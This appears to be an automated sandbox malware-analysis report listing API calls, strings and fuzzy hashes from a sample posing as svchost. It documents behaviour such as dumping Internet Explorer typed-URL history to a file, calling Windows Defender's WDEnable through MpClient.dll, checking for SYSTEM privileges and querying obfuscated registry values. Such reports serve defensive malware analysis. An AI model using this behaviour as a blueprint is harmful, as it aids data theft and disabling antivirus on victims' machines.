                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?,00000000), ref: 02C74803
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7482B
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,755735B0), ref: 02C74862
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C74FAE,00000000), ref: 02C7488C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3BE4,00000001,02C74FAE,00000000), ref: 02C7489E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,02C74FAE,00000000), ref: 02C748CA
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C74FAE,00000000), ref: 02C748DC
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C748F7
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C7490D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                            • API String ID: 4020389783-427538202
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7682E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76835
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76849
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76858
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(00000000), ref: 02C7685F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768D3
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C768D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C768E3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C768E6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 296989886-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 92F358B2a$software\microsoft
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76111
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7612F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C7614A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000001,92F358B2a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C76171
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 92F358B2a$software\microsoft
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,7556F550,00000000,7744C3F0), ref: 02C92E15
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E88
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                            • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00402037
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402046
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                            • Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                              • Part of subcall function 02C82D50: GetProcessHeap.KERNEL32(00000008,02C93547,00000000,756934D0,7744C3F0,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D6E
                                                                                                                                                                                                              • Part of subcall function 02C82D50: HeapAlloc.KERNEL32(00000000,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D75
                                                                                                                                                                                                              • Part of subcall function 02C82D50: memset.MSVCRT ref: 02C82D85
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(7744C3F0,00000001,00000104,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02C934B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$AllocNameProcessUser$ErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                            • API String ID: 3937782766-374730529
                                                                                                                                                                                                            • Opcode ID: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                            • Instruction ID: 5d39b8423ee337d5eb484f8bc5143e6573950741a925296a020dcb575222c5bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF217B72D0014AA7CF12A6549C48BFBB7BD9FC8B05F1005D9E94593140EB70EB058BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02C8135E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02C8136B
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02C813A7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02C813D1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813E0
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813E3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813F0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813F3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 92f35da2a
                                                                                                                                                                                                            • API String ID: 780088666-2326710769
                                                                                                                                                                                                            • Opcode ID: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                            • Instruction ID: 874ce55ae577560d7386450904837d24a7f509fa39a457052b45d97fe50e9868
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1110671F8425967EB2166259C09FDBBBECDF80B05F044694F98DEB1C0DEE099858BD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02C83432
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1484339481-3673152959
                                                                                                                                                                                                            • Opcode ID: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                            • Instruction ID: 23968d54473004be1a826ad79e5164d9663e5341a45f5565242fb56e15f19d55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141C832E001999BDB26DA649D09FDABBB89FC1F08F0491D5ED44A7100DB70DB058BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SymGetModuleBase.DBGHELP(00000000,?,?,?), ref: 02C73889
                                                                                                                                                                                                            • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C7389C
                                                                                                                                                                                                            • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C738B3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C738DD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73901
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                            • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                            • API String ID: 844136142-2194319270
                                                                                                                                                                                                            • Opcode ID: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                            • Instruction ID: ee176164c65198b71dffdc2ec012dc55a2265955e45dc6228db0b5408bef8a28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F212372A00198ABE7229E48DC84FFA73ACEF84700F0481D9F809A7140E7719B58DBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C822C8
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C822FF
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,92F35CFEa,00000000,02C859A4,00000000,?,?,02C859A4), ref: 02C8231C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82326
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C82359
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92F35CFEa,00000000,?,00000000,02C859A4,?,02C859A4), ref: 02C82376
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82380
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92F35CFEa$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-1533605276
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C88B18
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02C88CD7), ref: 02C88B4F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02C88CD7,92f35cb6a,00000000,?,00000000,?), ref: 02C88B6C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02C88CD7), ref: 02C88B76
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C88BA9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92f35cb6a,00000000,?,00000000,?), ref: 02C88BC6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C88BD0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92f35cb6a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-1370861648
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,92f35d24a,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92f35d24a,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
